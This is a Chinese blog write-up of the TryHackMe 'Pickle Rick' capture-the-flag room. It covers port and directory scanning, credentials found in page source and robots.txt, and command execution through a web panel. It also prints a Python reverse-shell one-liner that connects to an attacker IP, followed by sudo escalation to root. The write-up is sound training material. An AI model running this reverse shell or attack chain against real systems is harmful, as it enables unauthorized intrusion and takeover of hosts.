TryHackMe-Pickle_Rick

已于 2023-01-15 14:15:31 修改
阅读量196 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: linux 渗透测试 权限提升 CTF web安全
于 2023-01-05 22:33:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128571458
版权

Pickle Rick

瑞克和莫蒂的CTF。 帮助瑞克变回人类!

端口扫描

循例 nmap扫:

22/tcp open  ssh
80/tcp open  http

上80的web看看

web目录扫描

gobuster dir --url http://10.10.20.183/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x php,txt

/robots.txt 一串字符串
/denied.php -> 重定向到login.php

主页源代码披露用户名:

 <!--

    Note to self, remember username!

    Username: R1ckRul3s

-->

用户名有了,登录系统都有了,不妨再试试那串字符串是不是密码

登录成功

RCE

一个命令执行框入目眼帘,执行whoami成功返回结果

Reverse shell

python3 -V正常返回结果,故利用python getshell

payload:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.39.48",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

成功

权限提升

查看sudo -l

(ALL) NOPASSWD: ALL

太简单了,直接:

sudo su

root@ip-10-10-20-183:/var/www/html# whoami
root

第一种成分是在 Sup3rS3cretPickl3Ingred.txt

第二种成分是在:

root@ip-10-10-20-183:/home/rick# cat "second ingredients"

第三种成分是在/root下:

root@ip-10-10-20-183:~# cat ./3rd.txt
Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 382
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
keras_pickle_wrapper:一个包装Keras模型以使其腌制的小型库
05-01
pip install keras-pickle-wrapper 用法 import keras import pickle import numpy as np from keras_pickle_wrapper import KerasPickleWrapper ins = keras . layers . Input (( 2 ,)) x = ins x = keras . ...
TryHackMe靶机- Pickle Rick
Che_ng的博客
03-18 197
TryHackMe靶机- Pickle Rick
Tryhackme-Starters
个人博客
11-03 718
Starters 文章目录StartersRickle RickTask1 Pickle RickMr Rebot CTFTask1 Connect to our networkTask2 Hack the machinetomghostTask1 FlagsDogcatTask1 DogcatGit HappensTask1 Capture the FlagNaxTask1 FlagThe MarketplaceTask1 The MarketplacekibaTask1 Flags Rickle
Tryhackme靶机-Pickle Rick wp
m0_64777251的博客
04-10 405
发现22 80 端口开放访问80端口这里图片卡了没显示图片是这样就是用burpsuite 爆破吧查看页面源代码发现username:R1ckRul3s目录爆破发现几个可以访问的目录 依次访问有个login.php 账号是源代码里的那个然后密码是robots.txt里那一串我这里直接登陆了 上面就是登录后的页面 一个命令执行框输入 ls -al 有这么多的文件读取一下clue.txt Sup3rS3cretPickl3Ingred.txt第一个是提示我们在别的文件里也可以找找。
TryHackMe-Pickle Rick练习
m0_74606212的博客
01-21 343
TryHackMe-Pickle Rick练习
​在使用YOLOv7进行训练时,出现 magic_number = pickle_module.load(f, **pickle_load_args) _pickle.Unpickling
昔年 ~ 不忆的博客
04-11 1568
​在使用YOLOv7进行训练时,出现 magic_number = pickle_module.load(f, **pickle_load_args) _pickle.Unpickling
HTB-baby website rick
网安星空
01-24 680
HackTheBox网站CTF靶场Web相关题目baby website rick,主要考察pickle反序列化漏洞的利用。
Pravanasta-Rian-Setiawan_I0320078_Aditya-Mahendra_Tugas3
03-18
5. **标准库的使用**:Python有丰富的标准库,如os用于操作系统接口,sys用于系统相关功能,math进行数学运算,json或pickle用于数据序列化,requests库用于网络请求等。 6. **第三方库**:例如,Numpy和Pandas用于...
vm-pickel_zip_
10-02
标题中的"vm-pickle_zip_"似乎与Python编程语言中的pickle模块和ZIP压缩格式有关。pickle模块是Python中用于序列化和反序列化对象的一个标准库,而ZIP是一种常见的文件压缩格式。在这里,我们可能是在讨论如何将...
Pickle Rick 腌黄瓜瑞克STL分件模型
04-12
Pickle Rick STL分件模型:3D打印技术在创意艺术中的应用》 "腌黄瓜瑞克",这个源自热门动画《瑞克和莫蒂》的角色,已经成为了流行文化的象征。而“Pickle Rick STL分件模型”则为粉丝提供了一个独特的机会,通过...
Storage-master_phython_
10-02
例如,使用pickle库可以将Python对象序列化为字节流,然后写入文件;使用zlib或gzip库可以对数据进行压缩,减少存储空间。 项目可能还涵盖了错误处理、日志记录、性能优化等方面,这些都是在开发高效存储系统时需要...
Linux】进程间通信(IPC)——匿名管道
2201_76024104的博客
07-08 1166
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 960
收藏向 使用解析
Linux】:程序替换
Yikefore的博客
07-09 1090
程序替换的详细介绍以及各种程序替换接口介绍以及使用!
Linux —— 进程间通信
最新发布
学习C++的小陈同学
07-11 932
本篇整理了关于进程间通信的内容,以及详解的介绍了两种进程间通信的方式,以及相关的接口和代码演练
linux积累-core文件是干啥的
hebtu666
07-09 4258
核心转储(core dump)文件是一个程序崩溃时所产生的文件,它记录了程序崩溃时的内存状态,包括程序计数器和寄存器内容等信息。此外,如果程序是在特定的库或者环境中运行时崩溃的,你可能还需要安装那些库的调试符号,并在调试器中设置相应的环境变量。: 当你有了核心转储文件后,你可以使用像GDB(GNU调试器)这样的调试器来分析它。首先,你需要确保你有相应的程序的带调试符号的可执行文件。: 根据调试器提供的信息,你可以检查源代码中可能导致问题的部分,例如无效的指针引用、数组越界或其他违反程序逻辑的操作。
LVGL ArchLinux VSCode环境运行
Sandman06的博客
07-10 324
很多包在Arch中名字都不一样,我配合GPT,找到了相同功能的包,配合官方步骤,大致过程如下。vscode用AUR管理器安装”visual-studio-code-bin“LVGL官方的Demo是跑在Ubuntu系的系统上的。# 用如下指令代替Ubuntu系apt指令。git保证项目完整,各模块更新就能跑起来了。# VSCode安装。
generate_quantization_table 方法 Calibrator.generate_quantization_table(model_proto, calib_dataset, pickle_file_path) 生成量化表。 实参 - model_proto (ModelProto):一个 FP32 ONNX 模型。 - calib_dataset (ndarray):用于计算阈值的校准数据集。数据集越大,生成量化表的时间越长。 - pickle_file_path (string):存储量化参数的 pickle 文件路径。 帮我根据这个说明写一个示例 使用pickle读取X_cal.pkl和y_cal.pkl
05-29
pickle_file_path = 'quantization_table.pickle' # 创建 Calibrator 对象 calib = Calibrator() # 生成量化表 calib.generate_quantization_table(model_proto, X_cal, pickle_file_path) ``` 在此示例中,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值